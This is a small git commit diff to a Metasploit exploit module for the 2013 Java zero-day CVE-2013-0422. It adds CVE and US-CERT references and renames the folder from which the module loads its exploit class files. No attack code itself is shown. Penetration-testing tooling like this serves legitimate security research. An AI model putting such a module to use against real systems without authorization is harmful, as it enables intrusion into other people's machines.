module also updated with refs

bug/bundler_fix
jvazquez-r7 2013-01-11 00:57:05 +01:00
parent 51f3f59d2f
commit 2c05af721c
1 changed files with 4 additions and 2 deletions

View File

@ -34,6 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
'juan vazquez' # Metasploit module
],
'References' => [
[ 'CVE', '2013-0422' ],
[ 'US-CERT-VU', '625617' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]
],
@ -73,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "Exploit.class")
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "B.class")
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length)